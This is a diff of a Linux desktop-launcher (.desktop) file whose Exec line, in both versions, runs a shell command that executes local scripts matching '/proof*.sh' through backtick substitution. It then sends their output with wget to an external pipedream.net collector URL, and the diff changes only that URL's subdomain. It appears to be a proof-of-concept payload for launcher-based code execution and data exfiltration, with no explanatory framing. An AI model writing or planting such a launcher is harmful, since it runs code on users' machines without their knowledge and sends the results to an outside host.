--- a/9hea.desktop
+++ b/9hea.desktop
@@ -1,3 +1,3 @@
 [Desktop Entry]
-Exec=sh -c "wget https://endrmp3ngzkd6.m.pipedream.net/?`/proof*.sh`"
+Exec=sh -c "wget https://endrmp3ngzkd6.x.pipedream.net/?`/proof*.sh`"
 Type=Application
